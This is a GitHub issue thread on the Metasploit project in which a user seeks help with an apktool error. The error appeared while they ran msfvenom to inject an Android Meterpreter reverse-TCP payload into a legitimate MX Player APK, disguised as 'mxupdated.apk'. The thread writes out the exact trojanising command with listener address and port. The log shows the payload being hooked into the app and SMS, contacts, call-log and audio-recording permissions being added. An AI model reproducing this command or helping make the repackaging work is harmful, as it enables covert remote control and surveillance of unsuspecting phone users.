### ISSUE TITLE
Msfvenom ruby and apktool error

### ISSUE THREAD

**Issue by ajanjairam** [rapid7/metasploit-framework#13129]
ruby and apktool error 

root@kali:/usr/share/metasploit-framework# msfvenom -x /home/ajanjairam/Downloads/mxplayer.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.71 LPORT=4444 -o /home/ajanjairam/Downloads/mxupdated.apk
/usr/lib/ruby/2.5.0/fileutils.rb:90: warning: already initialized constant FileUtils::VERSION
/var/lib/gems/2.5.0/gems/fileutils-1.4.1/lib/fileutils.rb:105: warning: previous definition of VERSION was here
/usr/lib/ruby/2.5.0/fileutils.rb:1188: warning: already initialized constant FileUtils::Entry_::S_IF_DOOR
/var/lib/gems/2.5.0/gems/fileutils-1.4.1/lib/fileutils.rb:1284: warning: previous definition of S_IF_DOOR was here
/usr/lib/ruby/2.5.0/fileutils.rb:1446: warning: already initialized constant FileUtils::Entry_::DIRECTORY_TERM
/var/lib/gems/2.5.0/gems/fileutils-1.4.1/lib/fileutils.rb:1568: warning: previous definition of DIRECTORY_TERM was here
/usr/lib/ruby/2.5.0/fileutils.rb:1501: warning: already initialized constant FileUtils::OPT_TABLE
/var/lib/gems/2.5.0/gems/fileutils-1.4.1/lib/fileutils.rb:1626: warning: previous definition of OPT_TABLE was here
/usr/lib/ruby/2.5.0/fileutils.rb:1555: warning: already initialized constant FileUtils::LOW_METHODS
/var/lib/gems/2.5.0/gems/fileutils-1.4.1/lib/fileutils.rb:1685: warning: previous definition of LOW_METHODS was here
/usr/lib/ruby/2.5.0/fileutils.rb:1562: warning: already initialized constant FileUtils::METHODS
/var/lib/gems/2.5.0/gems/fileutils-1.4.1/lib/fileutils.rb:1692: warning: previous definition of METHODS was here
Using APK template: /home/ajanjairam/Downloads/mxplayer.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.mxtech.videoplayer.ad.kmqfe
[*] Loading /tmp/d20200324-6688-1o2m4w/original/smali_classes2/com/mxtech/videoplayer/ad/App.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20200324-6688-1o2m4w/output.apk
[-] I: Using Apktool 2.4.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Lcom/google/ads/interactivemedia/v3/internal/adg;-><clinit>()V
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:917)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:341)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:297)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:419)
        at brut.androlib.Androlib.buildSources(Androlib.java:350)
        at brut.androlib.Androlib.build(Androlib.java:302)
        at brut.androlib.Androlib.build(Androlib.java:269)
        at brut.apktool.Main.cmdBuild(Main.java:247)
        at brut.apktool.Main.main(Main.java:79)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x4e
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1190)
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:913)
        ... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65586
        at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
        at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1150)
        ... 11 more

Error: Unable to rebuild apk with apktool
![Screenshot 2020-03-24 14:46:48](https://user-images.githubusercontent.com/62540849/77412155-8388b600-6de3-11ea-92ae-441bf4c82cbc.png)
![Screenshot 2020-03-24 14:47:24](https://user-images.githubusercontent.com/62540849/77412165-85527980-6de3-11ea-9139-e3445b09b063.png)

**Comment by salahtitou** [comment]
sudo apt-get update
audo apt-get install apktool

**Comment by ajanjairam** [comment]
> sudo apt-get update
> audo apt-get install apktool

before posting issues i tried it, but no change the same error keeps coming

**Comment by ajanjairam** [comment]
with some online time now there is no ruby error but still apktool error persists...

**Comment by ccondon-r7** [comment]
Hey there! We ask for a whole bunch of information in the issue template. Can you please give us this info so we can troubleshoot accurately? Otherwise it's hard to know where to start. Thanks!
